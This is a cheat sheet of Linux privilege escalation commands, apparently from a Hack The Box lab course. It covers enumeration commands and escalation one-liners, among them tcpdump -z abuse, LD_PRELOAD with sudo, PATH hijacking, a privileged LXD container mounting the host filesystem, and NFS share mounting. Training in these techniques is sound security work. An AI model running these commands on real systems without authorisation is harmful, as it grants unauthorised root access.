# Linux Privilege Escalation | **Command** | **Description** | | ----------------------------------------------------------------------------------- | ----------------------------------------------------- | | `ssh htb-student@` | SSH to lab target | | `ps aux \| grep root` | See processes running as root | | `ps au` | See logged in users | | `ls /home` | View user home directories | | `ls -l ~/.ssh` | Check for SSH keys for current user | | `history` | Check the current user's Bash history | | `sudo -l` | Can the user run anything as another user? | | `ls -la /etc/cron.daily` | Check for daily Cron jobs | | `lsblk` | Check for unmounted file systems/drives | | `find / -path /proc -prune -o -type d -perm -o+w 2>/dev/null` | Find world-writeable directories | | `find / -path /proc -prune -o -type f -perm -o+w 2>/dev/null` | Find world-writeable files | | `uname -a` | Check the Kernel versiion | | `cat /etc/lsb-release` | Check the OS version | | `gcc kernel_expoit.c -o kernel_expoit` | Compile an exploit written in C | | `screen -v` | Check the installed version of `Screen` | | `./pspy64 -pf -i 1000` | View running processes with `pspy` | | `find / -user root -perm -4000 -exec ls -ldb {} \; 2>/dev/null` | Find binaries with the SUID bit set | | `find / -user root -perm -6000 -exec ls -ldb {} \; 2>/dev/null` | Find binaries with the SETGID bit set | | `sudo /usr/sbin/tcpdump -ln -i ens192 -w /dev/null -W 1 -G 1 -z /tmp/.test -Z root` | Priv esc with `tcpdump` | | `echo $PATH` | Check the current user's PATH variable contents | | `PATH=.:${PATH}` | Add a `.` to the beginning of the current user's PATH | | `find / ! -path "*/proc/*" -iname "*config*" -type f 2>/dev/null` | Search for config files | | `ldd /bin/ls` | View the shared objects required by a binary | | `sudo LD_PRELOAD=/tmp/root.so /usr/sbin/apache2 restart` | Escalate privileges using `LD_PRELOAD` | | `readelf -d payroll \| grep PATH` | Check the RUNPATH of a binary | | `gcc src.c -fPIC -shared -o /development/libshared.so` | Compiled a shared libary | | `lxd init` | Start the LXD initialization process | | `lxc image import alpine.tar.gz alpine.tar.gz.root --alias alpine` | Import a local image | | `lxc init alpine r00t -c security.privileged=true` | Start a privileged LXD container | | `lxc config device add r00t mydev disk source=/ path=/mnt/root recursive=true` | Mount the host file system in a container | | `lxc start r00t` | Start the container | | `showmount -e 10.129.2.12` | Show the NFS export list | | `sudo mount -t nfs 10.129.2.12:/tmp /mnt` | Mount an NFS share locally | | `tmux -S /shareds new -s debugsess` | Created a shared `tmux` session socket | | `./lynis audit system` | Perform a system audit with `Lynis` |